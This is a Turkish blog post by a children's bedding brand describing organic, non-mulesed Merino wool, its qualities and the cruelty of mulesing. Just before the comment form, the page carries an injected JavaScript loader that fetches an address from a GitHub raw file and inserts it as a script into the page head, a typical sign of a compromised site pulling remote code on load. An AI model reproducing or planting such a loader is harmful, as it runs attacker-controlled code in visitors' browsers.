;

Merino yünü (Organik, non-mulesed) | Bilinmesi gerekenler

Merino Yünü - NiteNite

Merino yünü (Organik, non-mulesed) | Bilinmesi gerekenler

Merino yünü (Organik, non-mulesed) | Bilinmesi gerekenler

Merino yünü hakkında bilgi sahibi olmalısınız. Sevgili Nite Nite Blog okuru, bugünkü yazımızda size battaniyelerimizde de kullandığımız %100 organik ve non-mulesed, yani üretim ve işlenme süreçleri tamamen doğal şekilde gerçekleştirilen; koyuna hiçbir zarar vermeden alınan Merino yününü anlatacağız.

Merino Yünü, Organik pamukBarışçıl bir dünyanın sağlıklı ve mutlu çocuklar yetiştirmekle, doğayla ahenk içinde yaşamakla, hayvanlara yaşamın her alanında saygı duymakla mümkün olduğuna inanıyoruz. Bu yüzden her bir ürünümüzü tamamen organik malzemelerle üretiyor, yaşamın sürdürülebilirliğine üretim ve satış süreçlerimizin her anında katkıda bulunmaya çalışıyoruz.

Dünyada farklı yün türleri üreten 200’den fazla koyun türü ve ırkı bulunuyor. Bu türler arasında, Avustralya’da ve ülkemizde yetiştirilen Merino koyunları en ince ve yumuşak yüne sahip. Peki Merino koyununu ve ondan üretilen yünü bu kadar kaliteli yapan nedir? Üretim ve işlenme aşamaları organik olarak gerçekleşiyor mu? Yünün hayvandan alınması sırasında hayvanların zarar görmemesini sağlayan non-mulesing yönteminin ayrıntıları neler? Bu yün bebeklerin ve çocukların hassas cildine uygun mu?

Hepsini anlatalım.

1.  Organik Merino yünü doğal ve dayanıklıdır.

Organik Merino, ülkemizde ve Avustralya’da temiz havada yaşayan, doğal su ve organik otlarla beslenen hayvanlardan, onlara asla zarar vermeden alınır. Hem hafif hem de dayanıklıdır.

2.  Merino yünü nem tutmaz; hassas ciltlere uygun ve yumuşacıktır.

Her yıl yeni bir post üreten Merino koyunları, hassas ciltlere uygun, yumuşacık ve antialerjik özellikte bir yün verir. Isı değişimine adapte olabildiği için nemi buharlaştırarak ciltten atar. Ayrıca ağırlığının %35’i kadar nemi emer. İkinci bir ten niteliğindeki biyolojik yapısıyla terlemeyi engelleyerek kullanıcıya hareket alanı sunar.

3.  Non-mulesing yöntemi nedir? Non-mulesed yün nasıl olur?

1930’lu yıllarda ortaya çıkan mulesing yönteminde, koyunların derisi anestezi kullanılmadan kesilir. Sinek yumurtaları deriye yerleşmesin diye kullanılan bir yöntem olmasına rağmen kanayan yaralar daha çok kurtçuk istilasına sebep olur. Bu vahşi yöntem, koyunların büyük bir korku yaşamasına, acı çekmesine ve haftalar boyunca açık yaralarla yaşamasına sebep olur. Non-mulesing ise hayvanların vücut bütünlüğünün bozulmadığını ve çeşitli kimyasallara maruz bırakılmadığını garantileyen süreçleri içeren bir yün toplama yöntemidir.

4.  Neden organik ve non-mulesed yün içerikli ürünler kullanmalısınız?

Merino Yünü, Organik pamuk

Sürdürülebilir bir doğa ve yaşam için hem tekstil üreticilerine, hem satıcılara hem de tüketicilere önemli görevler düşüyor. Eğer barış dolu bir dünyadan söz edeceksek yününü bizimle paylaşan koyunun mutluluğunu da kendi mutluluğumuz kadar önemsemeliyiz. Organik sertifikalı ve non-mulesed metotlarla üretilen yünler, koyunların karınlarının doyduğu, korku ya da stres yaşamadığı, hiçbir zulme maruz bırakılmadan kendi doğasına uygun ve özgür şekilde yaşadığı ortamlardan gelir. Ayrıca bu tip yünler, daha fazla elastikiyet sunarak ürünün, şeklini uzun yıllar korumasını sağlar.

(var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

LEAVE A COMMENT

Your email address will not be published. Required fields are marked *